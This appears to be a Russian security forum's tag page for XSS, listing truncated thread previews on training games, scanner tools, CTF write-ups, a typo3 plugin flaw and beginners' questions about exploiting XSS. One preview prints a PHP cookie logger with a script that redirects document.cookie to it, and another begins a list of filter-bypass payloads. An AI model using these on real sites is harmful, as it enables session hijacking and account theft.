xss

Всем салют, вот наткнулся сегодня случайно на игру от компании Google, которая позволяет потренировать свои навыки работы с приложениями, которые не достаточно качественно фильтруют пользовательский ввод, в следствии чего появляется возможность выполнения кода не предусмотренного логикой...

Получается вот такой пэйлод, как избавиться от символа "]", чтобы всё отработало? <textarea name="subscribe"> my_payload - пользовательские данные:

You must be registered for see element. Добрый день,Уважаемые Жители Форума,Друзья и Читатели. В эти выходные довелось провести тест одного ресурса. Как-то убежал из вида при этом интересный инструмент для проведения pentest. Восполняю пробел,так сказать. Создал софт Lucifer1993 - это мощная...

Это аналог статьи «You must be registered for see element.», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать. Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является You must be registered...

Всем доброго времени суток! Еще давно наблюдал данный контент и как то было лень опровергать это, да и времени не было, а вот сейчас призадумался, не пи#%шь ли это? (сразу вспомнил шоу идиоты на карамба тв :D) Так вот суть: "Каратель шк" ищет на серверах (кс-го) школьников которые хотят обмануть...

Начал изучать xss. Сразу появился вопрос. Если ресурс уязвим к данной атаке, можно ли с помощью этой уязвимости, загрузить на атакуемый сервер payload и получить доступ к серверу?

You must be registered for see element. Добрый вечер,Уважаемые Форумчане и Друзья. Сегодня вам хочу представить интересный небольшой framework. Создателем этого замечательного инструмента является Bahaabdelwahed. Арабская школа пентеста. В killshot входят многие модули расположенные для...

Всякий раз, когда я вижу форму загрузки файла во время теста , я обращаю на это внимание. В лучшем случае я могу загрузить обратную оболочку(shell) на языке сценариев, доступном на веб-сервере. Если приложение работает например на PHP или ASP, это становится довольно легко. Если я не могу...

Бодрый вечер, очень интересует тема xss уязвимостей, насколько я понял, для этого в изучении нужен в основном javascript или что то еще? Погуглив понял, что в основном все JS туторы созданы для фронт-енд(тот же UDEMY полон туторов для веба), может быть есть какая то особая прикладная область...

Доброго времени суток господа и дамы. Сегодня опишу уязвимость найденную в расширение tt_news для typo3. Мы имеем typo3 версии 6.2.30 , расширение tt_news версии 3.6.0 (выделено красным).You must be registered for see element. Так вот при создании новости на сайте, можно внедрить свой ява-скрипт...

Нашел на одном сайте XSS, решил сделать куки стилер создал файл в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location = '' + document.cookie;</ScRiPt> На сайте...

Статья для участия в You must be registered for see element.на codeby Многие видели hackerone выложили курс по безопасности веба с видеоуроками как по мне уроки для совсем начинающих но к ним есть практические задания которые оказались очень даже интересными и тут я опишу некоторые решения...

You must be registered for see element. XsSCan - это инструмент python для поиска уязвимостей Cross Site Scripting на веб-сайтах. Этот инструмент является лучшим в своем роде. Вместо того, чтобы просто проверять одну страницу, как это делают большинство инструментов, этот инструмент...

Всем Салам. Сегодня уже 2 часть из цикла статей You must be registered for see element.. И эта статья обещает быть информативной, особенно для новичков. И чтобы было представление о XSS, я разделю статью на 2 части, где в 1ом разберем, что за зверь этот XSS. А во втором рассмотрим, как она...

You must be registered for see element. Не много тем про CTF, а ведь многие именно благодаря этим соревнованиям, начинают интересоваться ИБ и хакингом. Поэтому предлагаю, делится решениями нестандартных тасков, да и в общем продвигаться в этой области на форуме. В перспективе собрать команду...

Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему. Payload #1: <svg xml:base="data:image/svg+xml;base64, PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW...

You must be registered for see element. Приветствую Уважаемых Друзей,Форумчан и Дорогих гостей нашего форума. Сегодня обзор будет о инструменте-сканере xsstrike от замечательного автора UltimateHackers Сомневался по-поводу целесообразности обзора. Но т.к.сведения о сканере начали активно...

Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )